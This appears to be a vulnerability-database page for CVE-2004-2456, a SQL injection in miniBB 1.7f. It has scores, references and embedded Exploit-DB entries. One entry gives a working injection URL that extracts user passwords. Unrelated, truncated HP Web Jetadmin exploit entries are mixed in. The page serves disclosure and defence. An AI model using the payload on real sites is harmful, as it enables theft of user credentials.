CVE-2004-2456
published 2004-12-31CVE-2004-2456: SQL injection vulnerability in index.php in miniBB 1.7f and earlier allows remote attackers to execute arbitrary SQL commands via the user parameter in a…
PriorityP336high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.65%
83.7th percentile
SQL injection vulnerability in index.php in miniBB 1.7f and earlier allows remote attackers to execute arbitrary SQL commands via the user parameter in a userinfo action.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| minibb | minibb | — | — |
| minibb | minibb | — | — |
| minibb | minibb | — | — |
| minibb | minibb | — | — |
| minibb | minibb | — | — |
| minibb | minibb | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MiniBB 1.7f - 'user' SQL Injection
exploitdb·2004-11-16
CVE-2004-2456 MiniBB 1.7f - 'user' SQL Injection
MiniBB 1.7f - 'user' SQL Injection
---
Example:
http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/*
# milw0rm.com [2004-11-16]
Exploit-DB
HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution
exploitdb·2004-03-24
CVE-2004-1857 HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution
HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution
---
source: https://www.securityfocus.com/bid/9973/info
Reportedly HP web Jetadmin is prone to a remote arbitrary command execution vulnerability. This issue is due to a failure of the application to properly validate and sanitize user supplied input.
Successful exploitation of this issue will allow a malicious user to execute arbitrary commands on the affected system.
This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.
/plugins/hpjfpmui/script/wja_update_product.hts:
(Changed the value of obj to our DoS function)
The following proof of concept that will create a user account has been provided by H D Moore :
https://:8443/plugins/framework/script/tree.xm
Exploit-DB
HP Web Jetadmin 7.5.2456 - Printer Firmware Update Script Arbitrary File Upload
exploitdb·2004-03-24
CVE-2004-1856 HP Web Jetadmin 7.5.2456 - Printer Firmware Update Script Arbitrary File Upload
HP Web Jetadmin 7.5.2456 - Printer Firmware Update Script Arbitrary File Upload
---
source: https://www.securityfocus.com/bid/9971/info
HP Web Jetadmin is prone to an issue which may permit remote users to upload arbitrary files to the management server.
This issue exists in the printer firmware update script. Given the ability to place arbitrary files on the server to an attacker-specified location, it may be possible to execute arbitrary code, though this will require exploitation of other known vulnerabilities, such as BID 9972 "HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability".
Authentication, if it has been enabled, would be required to exploit this issue.
This issue was reported in HP Web Jetadmin version 7.5.2546 on a Windows platform. Other versions may be
Exploit-DB
HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal
exploitdb·2004-03-24
CVE-2004-1857 HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal
HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal
---
source: https://www.securityfocus.com/bid/9972/info
It has been reported that HP Web JetAdmin may be prone to a directory traversal vulnerability allowing remote attackers to access information outside the server root directory. The problem exists due to insufficient sanitization of user-supplied data passed via the 'setinclude' parameter of 'setinfo.hts' script.
This vulnerability can be combined with HP Web Jetadmin Firmware Update Script Arbitrary File Upload Weakness (BID 9971) to upload malicious files to a vulnerable server in order to gain unauthorized access to a host.
This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.
https://www.exam
No writeups or analysis indexed.
http://securitytracker.com/id?1012164http://www.minibb.net/forums/index.php?action=vthread&forum=1&topic=1767http://www.minibb.net/forums/index.php?action=vthread&forum=9&topic=1854http://www.osvdb.org/11711http://www.securityfocus.com/bid/11688https://exchange.xforce.ibmcloud.com/vulnerabilities/18080http://securitytracker.com/id?1012164http://www.minibb.net/forums/index.php?action=vthread&forum=1&topic=1767http://www.minibb.net/forums/index.php?action=vthread&forum=9&topic=1854http://www.osvdb.org/11711http://www.securityfocus.com/bid/11688https://exchange.xforce.ibmcloud.com/vulnerabilities/18080
2004-12-31
Published